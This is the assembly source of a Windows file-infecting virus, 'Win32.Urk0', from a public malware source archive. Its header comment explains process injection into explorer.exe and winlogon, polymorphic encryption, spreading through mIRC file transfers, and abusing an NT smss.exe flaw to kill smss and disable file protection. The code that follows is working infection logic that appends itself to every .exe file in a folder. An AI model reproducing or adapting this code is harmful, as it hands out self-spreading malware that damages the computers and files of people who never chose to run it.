mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 11:55:26 +00:00
3211 lines
82 KiB
NASM
3211 lines
82 KiB
NASM
|
||
;THIS IS A VIRUS SOURCE CODE.NOW,THIS FILE ITS NOT DANGER.IM NOT RESPONSABLE OF DAMAGES
|
||
;IN CASE YOU COMPILE AND LINK IT TO CREATE A EXECUTABLE.THIS CODE IS ONLY FOR ENTERTAIMENT
|
||
;AND EDUCATION.
|
||
;I KNOW THIS CODE COULD TO HAVE (AND IM 99% SURE IT HAS) BUGS. I CODED IT ONLY FOR
|
||
;FUN, I NO WANT THIS VIRUS INFECTED COMPUTERS UNLESS YOU DID IT FOR UR ELECTION SO
|
||
;IM NOT REALLY WORRIED COZ THIS VIRUS IS NOT DONE FOR CORRUPT A SYSTEM.
|
||
;
|
||
;win32.Urk0 (Lady Marian 3)
|
||
;This is a Win32 virus.
|
||
;
|
||
;Win9x:
|
||
;It uses a method that i havent seen in other viruses.Second part of virus(where it
|
||
;polymorphs decryptor,infects,...) is descrypted and copied directly to other process
|
||
;that previously it creates(ill try it was a process created from a random file but for
|
||
;now it do it with explorer.exe) suspended.Then it unprotect mem of primary module of
|
||
;process with VirtualProtectEx and overwrite process mem with its code since entrypoint
|
||
;of new process.Then we reanude thread of created process so virus is executed in other
|
||
;process.This can be made MAX_DEPTH times.Explorer creates other process and inject there
|
||
;its code,and again and again and again...for MAX_DEPTH times.
|
||
;I think this difficults emulation and debugging.In addition if a
|
||
;memory monitor detects a virus behaviour in memory it detects virus as other file
|
||
;(for now explorer.exe).
|
||
;Note virus never infects explorer.exe in disk,only in memory,so if virus is searched in
|
||
;explorer.exe it is not found.In addition when i create new process i pass
|
||
;CREATE_NEW_PROCESS_GROUP flag so new process is created without father...
|
||
;suppostly there isnt relation between creator process and new process.
|
||
;In addition when virus is executing in explorer.exe it calls to RegisterServiceProcess
|
||
;so user doesnt see two explorer.exe in task list.
|
||
;With this method we return the control to host fastly becoz slow part of virus is executed
|
||
;currently with host becoz it is executing in explorer.exe where we are injected our code.
|
||
;First part of virus is encrypted.Decryptor is polimorphed.Key is changed with each generation.
|
||
;Polymorphic engine its not very complex.It interchanges registers used and inserts
|
||
;trash instructions.Trash uses recursively itself so we can find trash in this manner:
|
||
;
|
||
;xor reg32a,imm32a___
|
||
;add reg32b,imm32b_ |
|
||
;cli | |
|
||
;clc | |
|
||
;sub reg32b,imm32b_| |
|
||
;cli |
|
||
;cpuid |
|
||
;... |
|
||
;xor reg32a,imm32a___|
|
||
;...
|
||
;
|
||
;I wanna do it better with a v2.0 of the virus :P
|
||
;Second part is encrypted with random key.Decryptor its not poly.However,virus doesnt
|
||
;modify its code directly becoz it,while is injecting code to explorer.exe,is
|
||
;unencrypting bytes before injecting.
|
||
;It uses EPO method too.Insert a jmp(and ill insert some antidebugging trickz too)
|
||
;in entrypoint of infected file(later it restores bytes overwrited).
|
||
;Apis are gotten by CRC.
|
||
;For infection it adds itself at end of last section.Increase size of file infected.
|
||
;It only infects .exe files.
|
||
;For now Urk0 doesnt have payload(i dont know if i ll add it :-m )
|
||
;In addition Urk0 has two manners of infection.It can infect files with explorer code
|
||
;encrypted or withouth encrypting.If it isnt encrypted it have per-process characteristics.
|
||
;It works in the same manner but in addition it hooks CreateFileA api.
|
||
;It always infects mirc.exe file with per-process characteristics becoz mirc.exe use
|
||
;CreateFileA to open files that it will send(with dcc) so ill infect files before sending
|
||
;and in this manner virus will arrive other computer ;)(With mirc.exe and others similar).
|
||
;If you read this code you will see i have spend a lot of bytes that i could have not
|
||
;spend it,becoz for now i have not optimizated the code.I must optimizate it and
|
||
;optmizate poly engine.
|
||
;Structure of code:
|
||
;
|
||
; --------------------------------------SVirus
|
||
; -----------------------SCode
|
||
; (Entry point 2)
|
||
; Code executed
|
||
; after injecting
|
||
; in explorer.exe
|
||
; Encrypted with random.
|
||
; Note if this part is
|
||
; not encrypted some code
|
||
; here can be executed
|
||
; before injecting to
|
||
; explorer for
|
||
; perprocess propose
|
||
; -----------------------ECode
|
||
; (Entry point 1)
|
||
; Decryptor of code since
|
||
; Encrypted to EVirus
|
||
; -----------------------Encrypted
|
||
; Here it creates process
|
||
; explorer.exe and injects
|
||
; code(unencrypting SCode
|
||
; to ECode at same time it
|
||
; write each dword) to
|
||
; explorer.exe since entry
|
||
; point of it.When it has
|
||
; injected the code it reanude
|
||
; explorer and infection part
|
||
; and others important parts
|
||
; are executed in explorer.exe
|
||
; process.
|
||
; Later it restore for EPO
|
||
; overwrited bytes and jmp
|
||
; to host
|
||
; --------------------------------------EVirus
|
||
;
|
||
;WinNT:
|
||
;In NT machines virus works in a manner very different.In Nt,virus will try to get a
|
||
;handle to winlogon.exe with full privileges,using a flaw in dbgss implemented in smss.exe
|
||
;(you can see debploit flaw in august archives,Nt focus,www.securiteam.com).Using this flaw
|
||
;we inject our code in winlogon.Note that with this flaw we have a problem,when we try to get
|
||
;a handle to winlogon with debploit method,winlogon will terminate when our program
|
||
;terminate too,becouse our program set as debugger of winlogon,and winlogon as debuggee,
|
||
;so if we attach winlogon,when we terminate,it will terminate too.For this reason,winlogon
|
||
;code will kill smss.exe.Ok,this is a dramatic solution,however i think system will work
|
||
;very well without smss.exe.Smss.exe loads winlogon.exe and user mode part of win32 ss
|
||
;in memory,and when system hangs,it takes control and show typical blue screen.In addition,
|
||
;it have implemented dbgss so if we kill it,a lot of debugger will not run(mmm...is this a
|
||
;problem??? ;).I was working a lot of time in my system with smss.exe terminated and i think
|
||
;my system worked perfectly(i wasnt be able to use debuggers...only softice).
|
||
;well,when winlogon code kills smss.exe,it disables sfp with ratter and benny method(29a
|
||
;number 6).Later it gets a handle to explorer and injects the code there.In explorer,
|
||
;virus will infect current folder of explorer.exe in intervals of 60 seconds.
|
||
;Note virus use ModuleBase + 28h for infection mark.At this offset there are 5 reserved dwords
|
||
;in dos header.I think to put infection mark in this field is a few lame :P ... i could
|
||
;to have put it in second field of time date stamp or with others methods but im not worry
|
||
;for infection mark.
|
||
;
|
||
;
|
||
;and that is all :)
|
||
;
|
||
;
|
||
;SORRY BECOZ MY ENGLISH LEVEL ITS VERY LOW SO I M SORRY IF YOU DONT UNDERSTAND SOME
|
||
;EXPRESSIONS THAT I USE BADLY.HOWEVER ILL TRY TO WRITE BETTER I CAN :)
|
||
;
|
||
;I MUST TO APOLOGIZE TOO COZ MY BADLY MANNER OF PROGRAMMING. MY CODE IS NOT OPTIMIZED
|
||
;FOR FAST AND NOT OPTIMIZED FOR SIZE :P . IN ADDITION THIS IS A CRAZY CODE :S
|
||
;REALLY,IF I HAD TO READ IT I WOULD BE VERY ANGRY WITH THE AUTHOR :P COZ PERHAPS THE CODE
|
||
;IS NOT VERY MUCH UNDERSTANDABLE. SORRY .
|
||
;
|
||
;
|
||
;THX TO:
|
||
;
|
||
;OF COURSE: <20> XEZAW ! My dear m3Nt0r - THX.exp 99 :) He shows with lot of pacience
|
||
;to this poor person (me) all i know. Ill never be able to pay u all u have done for me :)
|
||
;MsCorlib who always helps me too :) a half of this virus is your ;) You are other m3Nt0r
|
||
;for me. In addition u know all things that i ask u O_O u r a genius :)
|
||
;GriYo who always helps me too.Though not directly,you are a m3Nt0r for me too :) with
|
||
;your viruses.I love Dengue :),its a bible for me ;)
|
||
;Benny&Ratter,thx for that fantastic codes as Joss,ketamine,dob,all ratter's articles
|
||
;about windows, sfc disable :) and all all all ;) thx.
|
||
;My good friends VirusBust,ViR[-_-],isotope,Pato,Nightmare
|
||
;_HangMan_ & Oyzzo ;) my dear msdos lovers :D
|
||
;And all people in #asm,#win32asm,#win32,#ensamblador and #virus in irc hispano
|
||
;who helped me :)
|
||
;Well,i must put here a endless list of 'THX TO' becoz a lot of people have helped me,so
|
||
;ill only say thx all :*** and of course,if someone need me im here ;)
|
||
;And a infinitely 'THX TO' for LADY MARIAN: my Dark Angel,my Black Lotus,my Takhisys,
|
||
;my Queen Of Darkness,... :*******************************************************
|
||
;Who is Urko?
|
||
;Urko is a dog. Urko is one of my best friends. Urko is a fantastic dog becoz sometimes.....
|
||
;Urko SPEAKS! Urko is very timid and only speaks to me...and not always...urko only
|
||
;speaks when both,urko and me,we start to smoke that rare cigarretes that urko has. Then
|
||
;urko start to speak a lot of :) and we stay all night speaking,smoking and seeing films or
|
||
;playing trivial pursuit,or coding,or doing a lot of things :)
|
||
;Due this,i named this virus as win32.urk0 :)
|
||
|
||
.586p
|
||
.model flat,stdcall
|
||
|
||
extrn ExitProcess:proc
|
||
extrn GetLastError:proc
|
||
extrn GetTickCount:proc
|
||
extrn GetModuleHandleA:proc
|
||
extrn OpenProcess:proc
|
||
|
||
;macros
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
callz macro dir_call
|
||
db 0E8h
|
||
dd (dir_call - $ - 4)
|
||
endm
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
jmpz macro dir_call
|
||
db 0E9h
|
||
dd (dir_call - $ -4)
|
||
endm
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
CalcLenString macro
|
||
local loopin
|
||
push esi
|
||
dec esi
|
||
loopin:
|
||
inc esi
|
||
cmp byte ptr[esi],0
|
||
jne loopin
|
||
mov ecx,esi
|
||
pop esi
|
||
sub ecx,esi
|
||
endm
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
GezApi macro BaseKernel,ApiCRC,ApiNameLen
|
||
mov eax,BaseKernel
|
||
mov edx,ApiCRC
|
||
mov ebx,ApiNameLen
|
||
callz GetApi
|
||
endm
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
GezSyscall macro BaseNtdll,ApiCRC,ApiNameLen
|
||
GezApi BaseNtdll,ApiCRC,ApiNameLen
|
||
mov eax,[eax + 1]
|
||
endm
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
syscallz macro fc,paramz ;from Ratter's win2k.Joss
|
||
mov eax,fc
|
||
lea edx,[esp]
|
||
int 2eh
|
||
add esp,(paramz*4)
|
||
endm
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
Writez macro BaseKernel,hProcess,OffsetInProc,Buffer,Size
|
||
push 0
|
||
mov [esp],esp ;for storing number of writted bytes
|
||
push Size
|
||
push Buffer
|
||
push OffsetInProc
|
||
push hProcess
|
||
GezApi BaseKernel,WriteMemoryProcessCRC,WMPNameLen
|
||
call eax
|
||
endm
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
Readz macro BaseKernel,hProcess,OffsetInProc,Buffer,Size
|
||
push 0
|
||
mov [esp],esp ;for storing number of read bytes
|
||
push Size
|
||
push Buffer
|
||
push OffsetInProc
|
||
push hProcess
|
||
GezApi BaseKernel,ReadMemoryProcessCRC,RMPNameLen
|
||
call eax
|
||
endm
|
||
;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
.data
|
||
|
||
;some datas for first generation
|
||
|
||
kernel32dll db 'kernel32.dll',0
|
||
auxi dd 0
|
||
az db 'Sleep',0
|
||
azz db 'ContinueDebugEvent',0
|
||
.code
|
||
start:
|
||
|
||
;vvvvvvvvvvvvvvvvvvvFIRST GENERATION CODE
|
||
jmpz jmpedSize
|
||
|
||
db '*Virus size'
|
||
virSize = EVirus - SVirus
|
||
db 0
|
||
dw virSize and 0FF00h
|
||
db virSize and 00FFh
|
||
db 0
|
||
|
||
jmpedSize:
|
||
|
||
;for getting apis crcs:
|
||
lea esi,az
|
||
CalcLenString
|
||
mov edi,ecx
|
||
call CRC32
|
||
lea esi,azz
|
||
CalcLenString
|
||
mov edi,ecx
|
||
call CRC32
|
||
|
||
;i unprotect code:
|
||
push offset kernel32dll
|
||
call GetModuleHandleA
|
||
push eax
|
||
mov esi,offset SVirus
|
||
mov ecx,EVirus - SVirus
|
||
xor ebx,ebx
|
||
callz UnprotectMem
|
||
pop eax
|
||
mov [kernel],eax
|
||
pushad
|
||
xor ebp,ebp
|
||
;ill test poly
|
||
callz Poly
|
||
mov eax,[CryptKey]
|
||
mov auxi,eax
|
||
popad
|
||
;I crypt necesary parts
|
||
call GetTickCount
|
||
or eax,0FFFF0000h
|
||
mov ecx,((ECode - SCode)/4)-1
|
||
inc ecx
|
||
Cryptit:
|
||
dec ecx
|
||
xor dword ptr [SCode + 4*ecx],eax
|
||
or ecx,ecx
|
||
jnz Cryptit
|
||
|
||
mov eax,auxi
|
||
|
||
callz DkRyPtIt_
|
||
DkRyPtIt_:
|
||
pop esi
|
||
add esi,Encrypted - DkRyPtIt_
|
||
mov ecx,((EVirus - Encrypted)/4)
|
||
GoGoGo_:
|
||
xor dword ptr [esi + ecx*4 - 4],eax
|
||
dec ecx
|
||
or ecx,ecx
|
||
jnz GoGoGo_
|
||
jmpz MyEntryPoint
|
||
|
||
;^^^^^^^^^^^^^^^^^^^FIRST GENERATION CODE
|
||
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
|
||
;vvvvvvvvvvvvvvvvvvvSECOND GENERATION
|
||
|
||
SVirus:
|
||
|
||
|
||
;APIS NAMES CRCS AND LENGHTS
|
||
|
||
LoadLibraryACRC equ 3fc1bd8dh
|
||
LLNameLen equ 12
|
||
CloseHandleCRC equ 0b09315f4h
|
||
CHNameLen equ 11
|
||
FindFirstFileACRC equ 0c9ebd5ceh
|
||
FFFNameLen equ 14
|
||
FindNextFileACRC equ 75272948h
|
||
FNFNameLen equ 13
|
||
FindCloseCRC equ 0d82bf69ah
|
||
FCNameLen equ 9
|
||
GetTickCountCRC equ 5b4219f8h
|
||
GTCNameLen equ 12
|
||
WriteMemoryProcessCRC equ 4f58972eh
|
||
WMPNameLen equ 18
|
||
ReadMemoryProcessCRC equ 0f7c7ae42h
|
||
RMPNameLen equ 17
|
||
ResumeThreadCRC equ 3872beb9h
|
||
RTNameLen equ 12
|
||
ExitProcessCRC equ 251097CCh
|
||
EPNameLen equ 11
|
||
SetFileAttributesACRC equ 156b9702h
|
||
SFANameLen equ 18
|
||
CreateFileACRC equ 553b5c78h
|
||
CFNameLen equ 11
|
||
CreateFileMappingACRC equ 0b41b926ch
|
||
CFMNameLen equ 18
|
||
MapViewOfFileCRC equ 0A89b382fh
|
||
MVFNameLen equ 13
|
||
UnmapViewOfFileCRC equ 391ab6afh
|
||
UVFNameLen equ 15
|
||
SetFileTimeCRC equ 21804a03h
|
||
SFTNameLen equ 11
|
||
GetModuleHandleACRC equ 0B1866570h
|
||
GMHNameLen equ 16
|
||
GetLastErrorCRC equ 0d2e536b7h
|
||
GLENameLen equ 12
|
||
RegisterServiceProcessCRC equ 3b5ef61fh
|
||
RSPNameLen equ 22
|
||
SetCurrentDirectoryACRC equ 69b6849fh
|
||
SCDNameLen equ 20
|
||
GetCurrentDirectoryACRC equ 0c79dc4e3h
|
||
GCDNameLen equ 20
|
||
GetWindowsDirectoryACRC equ 0fff372beh
|
||
GWDNameLen equ 20
|
||
GetModuleFileNameACRC equ 08bff7a0h
|
||
GMFNameLen equ 18
|
||
CreateProcessACRC equ 0a851d916h
|
||
CPNameLen equ 14
|
||
Module32FirstCRC equ 38891c00h
|
||
M32FNameLen equ 13
|
||
Module32NextCRC equ 0f6911852h
|
||
M32NNameLen equ 12
|
||
CreateToolhelp32SnapShotCRC equ 0c1f3b876h
|
||
CT32SNameLen equ 24
|
||
VirtualProtectExCRC equ 5d180413h
|
||
VPNameLen equ 16
|
||
GetCurrentProcessCRC equ 0d0861aa4h
|
||
GCPNameLen equ 17
|
||
OpenProcessTokenCRC equ 0f9c60615h
|
||
OPTNameLen equ 16
|
||
LookupPrivilegeValueACRC equ 0da87bf62h
|
||
LPVNameLen equ 21
|
||
AdjustTokenPrivilegesCRC equ 0de3e5cfh
|
||
ATPNameLen equ 21
|
||
EnumProcessesCRC equ 0509a21ch
|
||
EPSNameLen equ 13
|
||
EnumProcessModulesCRC equ 0dea82ac2h
|
||
EPMNameLen equ 18
|
||
GetModuleInformationCRC equ 0f2a84636h
|
||
GMINameLen equ 20
|
||
SuspendThreadCRC equ 0bd76ac31h
|
||
STNameLen equ 13
|
||
FreeLibraryCRC equ 0da68238fh
|
||
FLNameLen equ 11
|
||
GetVersionCRC equ 4ccf1a0fh
|
||
GVNameLen equ 10
|
||
RasDialACRC equ 0b88da156h
|
||
RDNameLen equ 8
|
||
GetModuleBaseNameACRC equ 1720513eh
|
||
GMBNNameLen equ 18
|
||
OpenProcessCRC equ 0df27514bh
|
||
OPNameLen equ 11
|
||
ZwConnectPortCRC equ 0cbaec255h
|
||
ZCPNameLen equ 13
|
||
NtConnectPortCRC equ 0c88edce9h
|
||
NCPNameLen equ 13
|
||
ZwRequestPortCRC equ 0e28aebd1h
|
||
ZRPNameLen equ 13
|
||
DbgUiConnectToDbgCRC equ 09a51ac3ah
|
||
DUCTDNameLen equ 17
|
||
DbgSsInitializeCRC equ 0d198b351h
|
||
DSINameLen equ 15
|
||
DbgSsHandleKmApiMsgCRC equ 2e9c4e99h
|
||
DSHKAMNameLen equ 19
|
||
GetCurrentProcessIdCRC equ 1db413e3h
|
||
GCPINameLen equ 19
|
||
GetCurrentThreadIdCRC equ 8df87e63h
|
||
GCTINameLen equ 18
|
||
WaitForDebugEventCRC equ 96ab83a1h
|
||
WFDENameLen equ 17
|
||
ContinueDebugEventCRC equ 0d8e77e49h
|
||
CDENameLen equ 18
|
||
VirtualAllocExCRC equ 0e62e824dh
|
||
VANameLen equ 14
|
||
CreateRemoteThreadCRC equ 0ff808c10h
|
||
CRTNameLen equ 18
|
||
NtTerminateProcessCRC equ 94fcb0c0h
|
||
NTPNameLen equ 18
|
||
ExitThreadCRC equ 80af62e1h
|
||
ETNameLen equ 10
|
||
GetCurrentDirectoryWCRC equ 334971b2h
|
||
GCDWNameLen equ 20
|
||
FindFirstFileWCRC equ 3d3f609fh
|
||
FFFWNameLen equ 14
|
||
SleepCRC equ 0CEF2EDA8h
|
||
SNameLen equ 5
|
||
|
||
|
||
|
||
Kernel32CRC equ 204c64e5h ;CRC of 'kernel32' string
|
||
|
||
|
||
ERROR_NO_MORE_FILES equ 18
|
||
PAGE_EXECUTE_READWRITE equ 40h
|
||
MEM_COMMIT equ 00001000h
|
||
MEM_RESERVE equ 00002000h
|
||
STARTUPINFOSIZE equ 68
|
||
PROCESSINFORMATIONSIZE equ 16
|
||
CREATE_SUSPENDED equ 4
|
||
DEBUG_PROCESS equ 1
|
||
CREATE_NEW_PROCESS_GROUP equ 200h
|
||
|
||
TH32CS_SNAPMODULE equ 8
|
||
SNAPSHOT equ 16
|
||
|
||
;config constants
|
||
MAX_DEPTH equ 1 ;min depth,for now
|
||
INFECTION_PROBABILITY equ 8 ;values 0 - 7...if value > 7 always infects.If 0 never.
|
||
PER_PROCESS_PROBABILITY equ 8 ;values 0 - 7...if value > 7 never infects with per-process
|
||
;characteristic.If 0 always with per-process.
|
||
WORK_IN_NT equ 1 ;if WORK_IN_NT == 1,virus works in NT and try to do
|
||
;some specifics things for NT.If 0,virus exits if NT.
|
||
|
||
|
||
SCode:
|
||
;when we infect in memory the explorer process injecting our code the execution begins here
|
||
|
||
;This code is encrypted with random key each 4 bytes
|
||
callz d_offsetz ;first byte is E8000000h when uncrypted
|
||
d_offsetz:
|
||
pop ebp
|
||
sub ebp,offset d_offsetz
|
||
pop eax
|
||
push eax
|
||
xor ax,ax
|
||
add eax,1000h
|
||
;eax -> a part of kernel32
|
||
SearchKernelz:
|
||
sub eax,1000h
|
||
cmp word ptr [eax],'ZM'
|
||
jne SearchKernelz
|
||
|
||
mov [ebp + kernel],eax
|
||
|
||
;we set our process as service process.
|
||
push eax
|
||
GezApi eax,RegisterServiceProcessCRC,RSPNameLen
|
||
push 1
|
||
push 0
|
||
call eax
|
||
pop eax
|
||
|
||
;we will setup a SEH frame and if a error occurs nobody know it :D
|
||
|
||
lea esi,[ebp + ExplorerEnd]
|
||
push esi
|
||
push dword ptr fs:[0]
|
||
mov fs:[0],esp ;we set the SEH frame
|
||
;note its not necessary our handler
|
||
;restore SEH becoz we will terminate
|
||
;the process
|
||
|
||
;we repeat the process of injection of code in explorer MAX_DEPTH times.When we have loaded
|
||
;and infected explorer at MAX_DEPTH time then it's executed file infection zone.
|
||
;I think it will be more difficult for avs with this trap.
|
||
|
||
cmp dword ptr [ebp + ExplorerDepth],MAX_DEPTH
|
||
je Explorer2
|
||
add dword ptr [ebp + ExplorerDepth],1
|
||
callz InjectToExplorer
|
||
GezApi eax,ExitProcessCRC,EPNameLen
|
||
push 0
|
||
call eax
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
;This code is executed in the last explorer.exe what we have injected our code
|
||
|
||
Explorer2:
|
||
;eax = Base of Kernel
|
||
;ebp = d_offset
|
||
|
||
mov dword ptr [ebp + ExplorerDepth],0 ;this is the last explorer injection
|
||
|
||
;now ill infect all files .exe in Current folder
|
||
callz InfectCurrentFolder
|
||
|
||
ExplorerEnd:
|
||
callz DoffEnd
|
||
DoffEnd:
|
||
pop ebp
|
||
sub ebp,offset DoffEnd
|
||
mov eax,[ebp + kernel]
|
||
;eax = kernel base
|
||
GezApi eax,ExitProcessCRC,EPNameLen
|
||
push 0
|
||
;eax -> ExitProcess
|
||
call eax
|
||
;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
kernel dd 0
|
||
CryptKey dd 0
|
||
ExplorerDepth dd 0
|
||
|
||
|
||
FILETIME struct
|
||
FT_dwLowDateTime dd ?
|
||
FT_dwHighDateTime dd ?
|
||
FILETIME ends
|
||
WIN32_FIND_DATA:
|
||
WFD_dwFileAttributes dd ?
|
||
WFD_ftCreationTime FILETIME <?>
|
||
WFD_ftLastAccessTime FILETIME <?>
|
||
WFD_ftLastWriteTime FILETIME <?>
|
||
WFD_nFileSizeHigh dd ?
|
||
WFD_nFileSizeLow dd ?
|
||
WFD_dwReserved0 dd ?
|
||
WFD_dwReserved1 dd ?
|
||
WFD_szFileName db 260 dup (?)
|
||
WFD_szAlternateFileName db 16 dup (?)
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
;
|
||
;InfectCurrentFolder infects files with mask in files variable in current folder
|
||
;in:
|
||
; none
|
||
;out:
|
||
; none
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
InfectCurrentFolder:
|
||
|
||
callz Poly ;we poly the decryptor overwriting code with new decryptor for
|
||
;the moment when we will infect a file
|
||
|
||
;here begins zone where we will infect files
|
||
;if all things are in order,current directory for memory-infected explorer
|
||
;is the same as file.exe that contains virus.
|
||
|
||
lea eax,[ebp + WIN32_FIND_DATA]
|
||
push eax
|
||
lea eax,[ebp + files]
|
||
push eax
|
||
mov eax,[ebp + kernel]
|
||
GezApi eax,FindFirstFileACRC,FFFNameLen
|
||
call eax
|
||
mov [ebp + SearchHand],eax
|
||
jmpz TestTypeOfInfection
|
||
|
||
MoreFiles: ;)
|
||
|
||
callz Poly ;poly again so each infected file will be different
|
||
lea eax,[ebp + WIN32_FIND_DATA]
|
||
push eax
|
||
push dword ptr [ebp + SearchHand]
|
||
mov eax,dword ptr [ebp + kernel]
|
||
GezApi eax,FindNextFileACRC,FNFNameLen
|
||
call eax
|
||
|
||
TestTypeOfInfection:
|
||
|
||
or eax,eax
|
||
je EndCurrentFolderInfection
|
||
mov eax,[ebp + kernel]
|
||
GezApi eax,GetTickCountCRC,GTCNameLen
|
||
call eax
|
||
and eax,7
|
||
cmp eax,INFECTION_PROBABILITY ;probability of infection.By default always.
|
||
jge MoreFiles
|
||
mov eax,[ebp + kernel]
|
||
GezApi eax,GetTickCountCRC,GTCNameLen
|
||
call eax
|
||
mov ecx,eax
|
||
mov ebx,eax
|
||
rol ebx,cl
|
||
and ebx,7
|
||
xor eax,eax
|
||
cmp ebx,PER_PROCESS_PROBABILITY ;probability of per-process.By default never.
|
||
jge WithPerProcess
|
||
inc eax
|
||
WithPerProcess:
|
||
push eax
|
||
callz TestFile
|
||
or eax,eax
|
||
jnz PerProcessOrNoInfect
|
||
pop eax
|
||
GoInfectIt:
|
||
callz InfectIt
|
||
jmpz MoreFiles
|
||
PerProcessOrNoInfect:
|
||
dec eax
|
||
or eax,eax
|
||
jz ForcePerProcess
|
||
;if no force perprocess and no normal,then -1 and no infect so more files
|
||
pop eax
|
||
jmpz MoreFiles
|
||
ForcePerProcess:
|
||
pop ebx
|
||
jmpz GoInfectIt
|
||
|
||
EndCurrentFolderInfection:
|
||
ret
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;
|
||
files db '*.exe',0
|
||
SearchHand dd 0
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
|
||
|
||
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
;
|
||
;InfectIt uses WIN_FIND_DATA for infecting file which information is contained in that struc
|
||
;in:
|
||
; eax = 0 without encryption(but with perprocess enable) eax = 1 with encryption(but
|
||
; no enabled perprocess)
|
||
;out:
|
||
; none
|
||
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
|
||
InfectIt:
|
||
mov [ebp + Encryption],eax
|
||
pushad
|
||
callz MapFile
|
||
or eax,eax
|
||
jz EndInfection
|
||
mov eax,[ebp + WFD_nFileSizeLow]
|
||
add eax,EVirus - SVirus
|
||
mov [ebp + FileInfectedSize],eax
|
||
mov ebx,[ebp + ViewHandle]
|
||
cmp word ptr [ebx],'ZM'
|
||
jne CloseAndBye
|
||
cmp word ptr [ebx + 8],4h
|
||
jne CloseAndBye
|
||
mov edi,[ebx + 3ch]
|
||
add edi,ebx
|
||
cmp word ptr [edi],'EP'
|
||
jne CloseAndBye
|
||
cmp word ptr [ebx + 28h],'Zv';my infection mark
|
||
je CloseAndBye
|
||
mov ax,[edi + 16h]
|
||
test ax,2 ;yes IMAGE_FILE_EXECUTABLE_IMAGE
|
||
je CloseAndBye
|
||
test ax,1000h ;no IMAGE_FILE_SYSTEM
|
||
jne CloseAndBye
|
||
test ax,2000h ;no IMAGE_FILE_DLL
|
||
jne CloseAndBye
|
||
mov ax,[edi + 5ch]
|
||
test ax,1 ;no IMAGE_SUBSYSTEM_NATIVE
|
||
jne CloseAndBye
|
||
|
||
;we have a file executable in PE format and not infected by this virus so ill continue
|
||
;with infection.In addition is not a system file.
|
||
|
||
|
||
mov edi,dword ptr [edi + 3ch];file alingment
|
||
mov dword ptr [ebp + FileAlignment],edi
|
||
AlignSize:
|
||
mov eax,[ebp + FileInfectedSize]
|
||
xor edx,edx
|
||
div edi
|
||
inc eax
|
||
;we divide size/alignment and inc result for knowing the new number of blocks
|
||
;and next we multiplicate number of blocks x size of block
|
||
mul edi
|
||
mov [ebp + WFD_nFileSizeLow],eax ;for in next mapping will be mapped file size + space for vir
|
||
callz CloseAll
|
||
callz MapFile ;with size to allocate virus
|
||
or eax,eax
|
||
jz EndInfection
|
||
|
||
;now we have file mapped with enought space at end of file to append there our virus ;)
|
||
|
||
mov ebx,[ebp + ViewHandle]
|
||
mov word ptr [ebx + 28h],'Zv';infection mark
|
||
mov eax,[ebx + 3ch];lfanew
|
||
add ebx,eax;ebx -> PE
|
||
mov eax,[ebx + 28h]
|
||
mov [ebp + OldEntryPoint],eax
|
||
xor eax,eax
|
||
mov ax,[ebx + 6];number of sections
|
||
mov [ebp + Sections],eax
|
||
xor eax,eax
|
||
mov ax,word ptr [ebx + 14h]
|
||
add ebx,18h
|
||
add ebx,eax
|
||
mov ecx,[ebp + Sections]
|
||
dec ecx
|
||
mov [ebp + FirstSection],ebx
|
||
LastSection:
|
||
add ebx,28h
|
||
loop LastSection
|
||
;we have ebx -> last section
|
||
mov [ebx + 24h],0A0000020h ;section is executable,readable,writable and with code
|
||
mov eax,[ebx + 10h];size of raw data
|
||
add eax,[ebx + 0ch];add size + RVA of section.
|
||
add eax,MyEntryPoint - SVirus
|
||
;eax = New Entry Point
|
||
sub eax,dword ptr [ebp + OldEntryPoint]
|
||
sub eax,EPOCodeSize
|
||
mov [ebp + EPOrel32],eax
|
||
mov eax,[ebx + 10h];size of raw data
|
||
add eax,[ebx + 14h];add size + pointer to raw data of section.We are in the end of last section
|
||
;We must copy there our code ;)
|
||
mov [ebp + EndLastSection],eax
|
||
|
||
mov esi,ebx
|
||
|
||
;now we must alignment section
|
||
|
||
mov eax,[esi + 10h];size of raw
|
||
